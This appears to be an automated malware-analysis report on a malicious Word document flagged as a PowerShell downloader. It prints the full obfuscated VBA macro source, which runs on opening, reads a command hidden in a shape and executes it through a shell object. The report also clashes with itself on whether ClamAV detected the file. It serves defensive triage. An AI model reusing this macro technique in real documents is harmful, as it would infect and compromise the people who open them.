Risk Score: 212 (MALICIOUS)
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1059.001 PowerShell
- T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing a VBA macro that executes upon opening. The macro references PowerShell and uses a GetObject call, indicating an attempt to download and execute a second-stage payload. The ClamAV detection 'Doc.Downloader.Powload-6826406-0' further supports this analysis.
Heuristics (8)
- ClamAV: Doc.Downloader.Powload-6826406-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Powload-6826406-0
- Reference to PowerShell (high, SC_STR_POWERSHELL): Reference to PowerShell
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- GetObject call (high, OLE_VBA_GETOBJ): GetObject call. Matched line in script: `End Select Set pioKoohEi = CVar(GetObject(zzVGdbm + "new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + uEqkat)) On Error Resume Next`
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Document_Open macro (low, OLE_VBA_DOCOPEN): Document_Open macro. Matched line in script: `Attribute VB_Customizable = True Private Sub Document_open() On Error Resume Next`
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6183 bytes |

SHA-256: 6dc5eab2ef7db1e3910355e95e3c7a5225318c4609379286de67a0e5d8de8aff

Detection
ClamAV: No threats found
Obfuscation or payload: likely. 103 of 169 identifiers look randomly generated (e.g. 'ENZkzVkrwHXj'), consistent with name-mangling obfuscation.
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "kYcNZziqSc"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next
HbLfJ = (CbhKFjwL - Oct(XqKRmdJL) * vfLsMp - Sgn(315108826) - 206071902 + Fix(LSZSrIUQz) + 1980455239 + 340157444 / 42441401 / CDJdToh)
Select Case cwPtjiXKO
Case 285538733
ZpltJE = CLng(334683445)
wWjfM = Int(acHiiW)
Case 51648432
DiUJYIiwF = Hex(224800778)
kjfRKAYU = CStr(252718056 * CByte(TwSDhJBQ))
End Select
On Error Resume Next
TtWTlOCRX = (psuTmwazZ - Oct(zLhRX) * cfmbd - Sgn(261163446) - 231883176 + Fix(Mliwsqqw) + 921620729 + 45547375 / 21015205 / UQRCzidO)
Select Case ILFvfmWiw
Case 103076647
JHHAR = CLng(185441811)
jJAza = Int(mlLOkb)
Case 336650967
UtEZZD = Hex(88908060)
URRrB = CStr(187471433 * CByte(JQlXat))
End Select
Set LkrJtbIuV = Shapes("ENZkzVkrwHXj")
On Error Resume Next
KvQrZXM = (mLiXF - Oct(LjICVZu) * GFqFC - Sgn(282495377) - 91895472 + Fix(BvzABafj) + 2397995189# + 109198032 / 257245437 / DhULGkwvs)
Select Case dvfBpKB
Case 136953605
VvwJjXE = CLng(192531651)
EZREmwFY = Int(iwRsSvYR)
Case 27489104
zkUiPuR = Hex(4111712)
YkoCG = CStr(90980284 * CByte(SLYJhwRZW))
End Select
On Error Resume Next
bJOoj = (RYfatwCZY - Oct(YvbjofJ) * jawMiV - Sgn(193765279) - 223482296 + Fix(TBDdFD) + 461793659 + 10240710 / 151752759 / SzpUcPtw)
Select Case BhSwAvI
Case 60957878
FpKzLiiYU = CLng(315167601)
rUiRzq = Int(qFWwpYG)
Case 214961161
AFChzuKv = Hex(218894797)
VmHlDuz = CStr(197538492 * CByte(jCBwJaS))
End Select
SrwaJNFYqrT = "" + ROVzKi + zjzItHf + VijTTCr + Alqiz + njjiIHE + LkrJtbIuV.TextFrame.TextRange.Text + ijHGIqPi + jIiWTRS + KYHpFav
On Error Resume Next
UNSNSAF = (dLivi - Oct(ZUVzVmPj) * LqosiXqtz - Sgn(239142251) - 211780110 + Fix(QqUtWTZWr) + 1345235849 + 155403515 / 39717219 / atBzbCJnS)
Select Case XdHbd
Case 256261722
iKwqJi = CLng(7478954)
wTpKD = Int(SiBDipwYh)
Case 151425805
wjwPO = Hex(292650961)
jZpMHARPA = CStr(285016291 * CByte(jTdOQEv))
End Select
On Error Resume Next
stzzPf = (bwmuJ - Oct(jTRhoV) * HwpoEw - Sgn(157848643) - 264289651 + Fix(chVFljZiw) + 584896419 + 221683828 / 140628459 / VUZOMTl)
Select Case TSiAL
Case 315764401
JtQHN = CLng(219508304)
FYDjwu = Int(jfnwlaUO)
Case 273128944
ECpIOrFZ = Hex(261931835)
UEsZHpB = CStr(101651831 * CByte(LdWrS))
End Select
Set pioKoohEi = CVar(GetObject(zzVGdbm + "new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + uEqkat))
On Error Resume Next
ULKOXN = (VioqSK - Oct(wHjkj) * SnhIfMThE - Sgn(232174378) - 212876714 + Fix(GJpsdpq) + 1115664589 + 312050825 / 142750933 / dbVRFN)
Select Case buwMu
Case 216788269
CiLtfQv = CLng(51245210)
MBPGdq = Int(SvwYEjJuO)
Case 129424832
HmYtO = Hex(53257314)
bHfXQF = CStr(128641981 * CByte(IJQqGal))
End Select
On Error Resume Next
rdjOXB = (lmGDrzYl - Oct(wpRiE) * VHDzBADZ - Sgn(12076840) - 166228629 + Fix(LJAozDUC) + 398747719 + 280357363 / 68088478 / wHKckGAOR)
Select Case BHcLZ
Case 3470902
iMEiKmOk = CLng(129555729)
mwfww = Int(KHqqXT)
Case 129733532
KPDHt = Hex(76349899)
dUTXiFSm = CStr(137976910 * CByte(sQFORmKCw))
End Select
On Error Resume Next
LiYLab = (WbGvpa - Oct(Wvmitt) * DqdYB - Sgn(32585701) - 295852876 + Fix(EiMdoXFHD) + 2195424779# + 298380489 / 233328133 / RBiNIvc)
Select Case RIrPLIn
Case 304820031
YWTWXYjL = CLng(252558455)
RnjwAJZlo = Int(KsJQamZVN)
Case 191079135
RNQIWP = Hex(55655729)
dvBWALlhL = CStr(283077438 * CByte(mWzuc))
End Select
Const MbUuipIoc = 0
On Error Resume Next
BpHah = (VtuiX - Oct(vKmFR) * mDXhw - Sgn(13817592) - 258761016 + Fix(UjInukw) + 1062456569 + 186163653 / 280896985 / SLpISFSZF)
Select Case GniwJ
Case 210342120
iTsFn = CLng(53831626)
mlHnmEfi = Int(KwwwuFcdc)
Case 223533593
NwiokF = Hex(274283081)
IwpfDHVj = CStr(325463635 * CByte(mAZXrTz))
End Select
On Error Resume Next
qZjNPfMi = (ZRoBvO - Oct(OSDSiDsc) * FfuWhECJ - Sgn(151513833) - 39322266 + Fix(zjucvH) + 2517187869# + 170105207 / 178207685 / nFtMrWXRz)
Select Case jHiJASHj
Case 137271723
fipujh = CLng(155572571)
WbQSBlR = Int(AKqifsX)
Case 121919748
rClcdADE = Hex(83689704)
JPzjJw = CStr(324895916 * CByte(YWNGssZRw))
End Select
NYqOcFnU = Array(GSChPtZwV, pioKoohEi.Run!(SrwaJNFYqrT, MbUuipIoc), soZYfw)
On Error Resume Next
AniAfLQU = (VDAzjSwr - Oct(UFIlqSOh) * oazzFvw - Sgn(104403338) - 152360382 + Fix(OtQKI) + 563926339 + 163239322 / 93057757 / XiNSXHBY)
Select Case PwPlzjb
Case 303876843
WwFCQvnc = CLng(313481459)
vAcRE = Int(KAbHbrD)
Case 150570174
Aatdvjj = Hex(92655328)
CPkUNRf = CStr(313045653 * CByte(zdbmiK))
End Select
On Error Resume Next
WlwPr = (MJDbnM - Oct(TZBXJ) * iAwszwqip - Sgn(248100846) - 285039856 + Fix(uBKtBbdmZ) + 2286992959# + 132203223 / 185066215 / AUzvisFr)
Select Case TzZswQAhX
Case 156885382
hsKzaX = CLng(171121772)
WVvjUHzir = Int(GtlBvhKT)
Case 62921454
MlrLwQD = Hex(52835929)
CVKSL = CStr(137988165 * CByte(XTEkAlJ))
End Select
End Sub